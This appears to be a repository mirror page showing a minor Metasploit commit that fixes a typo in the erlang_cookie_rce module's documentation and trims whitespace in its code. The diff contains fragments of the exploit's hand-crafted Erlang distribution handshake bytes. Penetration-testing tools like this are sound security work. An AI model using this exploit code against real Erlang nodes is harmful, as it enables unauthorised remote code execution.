infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

I didn't forget msftidy I swear

GSoC/Meterpreter_Web_Console
Milton-Valencia 2018-12-18 14:55:12 -06:00
parent 8a2a605a99
commit bb758f9a61
2 changed files with 3 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
documentation/modules/exploit/multi/misc/erlang_cookie_rce.md
View File

@ -113,7 +113,7 @@ msf exploit(multi/misc/erlang_cookie_rce) > exploit
[*] Exploit completed, but no session was created. [*] Exploit completed, but no session was created.
``` ```
Once exploitation is complete the tester can authenticate. Another method that can be used it SMB as shown below. Once exploitation is complete the tester can authenticate. Another method that can be used is SMB as shown below.
exploit.rc -> exploit.rc ->
``` ```

4
modules/exploits/multi/misc/erlang_cookie_rce.rb
View File

@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
send_name << "\x00\x05" # Version: R6 (5) send_name << "\x00\x05" # Version: R6 (5)
send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c) send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c)
send_name << "#{our_node}" # <generated>@<generated> send_name << "#{our_node}" # <generated>@<generated>
# SEND_CHALLENGE_REPLY: return generated digest and its own challenge # SEND_CHALLENGE_REPLY: return generated digest and its own challenge
send_challenge_reply = "\x00\x15" # Length: 21 send_challenge_reply = "\x00\x15" # Length: 21
send_challenge_reply << "\x72" # Tag: r send_challenge_reply << "\x72" # Tag: r
@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
send << "\x61" # SMALL_INTEGER_EXT send << "\x61" # SMALL_INTEGER_EXT
send << "\x06" # Int: 6 send << "\x06" # Int: 6
send << "\x67" # PID_EXT (103) send << "\x67" # PID_EXT (103)
send << "\x64\x00" # Node: send << "\x64\x00" # Node:
send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node) send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)
send << "#{our_node}" # Node send << "#{our_node}" # Node
send << "\x00\x00\x00\x03" # ID send << "\x00\x00\x00\x03" # ID